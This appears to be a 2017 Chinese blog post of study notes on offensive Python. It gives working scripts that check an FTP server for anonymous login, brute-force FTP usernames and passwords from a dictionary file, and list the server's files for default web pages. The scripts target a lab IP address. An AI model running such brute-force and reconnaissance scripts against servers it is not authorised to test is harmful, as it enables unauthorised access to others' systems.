Python绝技笔记--------FTP匿名访问检测、用户名密码爆破、扫描是否存在web服务默认网页

于 2017-01-21 18:28:07 发布
阅读量5.6k 收藏 3
点赞数
分类专栏: python绝技笔记 Python 文章标签: python ftp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28295425/article/details/54646006
版权

利用ftplib模块
很简单,先获取ftp,然后匿名访问的话用户名是 anonymous

# -*- coding: UTF-8 -*-
import ftplib
def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous','Recar@Recar.com')
        print '\n[*]'+str(hostname) + 'FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception,e:
        print '\n[-]'+str(hostname)+'FTP Anonymous Logon Failed.'
        return False
host = '192.168.150.137'
anonLogin(host)

这里写图片描述

加上optparse方便些

# -*- coding: UTF-8 -*-
import ftplib
import optparse
def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous','Recar@Recar.com')
        print '\n[*] '+str(hostname) + ': FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception,e:
        print '\n[-] '+str(hostname)+': FTP Anonymous Logon Failed.'
        return False

def main():
    parse = optparse.OptionParser("usage %prog -H <target host>")
    parse.add_option('-H',dest='tgtHost',type='string',help='specify target host')
    (options,args) = parse.parse_args()
    if (options.tgtHost==None):
        print parse.usage
    else:
        host=options.tgtHost
        anonLogin(host)
if __name__=='__main__':
    main()

这里写图片描述

那么可以写一个用户名密码爆破的工具,字典里面包含anonymous,那么就可以同时检测是否可以匿名登陆

# -*- coding: UTF-8 -*-
import ftplib
import optparse
from threading import Thread
def bruteLogin(hostname,passwordFile):
    with open(passwordFile,'r') as f:
        for line in f.readlines():
            username = line.split(':') [0]
            password = line.split(':') [1].strip('\r').strip('\n')
            print "[+] Trying: "+username+":"+password
            try:
                ftp = ftplib.FTP(hostname)
                ftp.login(username,password)
                print '\n[+] '+str(hostname)+': FTP Logon Succeeded: '+username+":"+password
                ftp.quit()
                return (username,password)
            except Exception,e:
                pass
        print '\n[-] Could not brute force FTP credentials.'
        return (None,None)

def main():
    parse = optparse.OptionParser("usage %prog -H <target host> -P <target password>")
    parse.add_option('-H',dest='tgtHost',type='string',help='specify target host')
    parse.add_option('-P',dest='tgtPassword',type='string',help='specify target password')
    (options,args) = parse.parse_args()
    if (options.tgtHost==None)|(options.tgtPassword==None):
        print parse.usage
    else:
        host=options.tgtHost
        passwordfile=options.tgtPassword
        bruteLogin(host,passwordfile)

if __name__=='__main__':
    main()

这里写图片描述

扫描 FTP服务器上是否有web服务的网页,扫描ftp文件中是否有默认的php,asp,html默认的网页。

# -*- coding: UTF-8 -*-
#这个版本设置的是利用的匿名登陆。当然用之前的爆破脚本爆破出用户名和密码在利用这个
import ftplib
def returnDefault(ftp):

    try:
        dirlist=ftp.nlst()
    except:
        dirlist= []
        print '[-] Could not list directory contents.'
        print '[-] Skipping To Next Target.'
        return
    retList = []
    for filename in dirlist:
        fn = filename.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print '[+] Found default page: '+filename
            retList.append(filename)
        else:
            print '[-] Sorry it`s not have web defaulte page'
        return retList
host ='192.168.150.137'
ftp = ftplib.FTP(host)
ftp.login('anonymous','')
returnDefault(ftp)

这里写图片描述

Recar
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值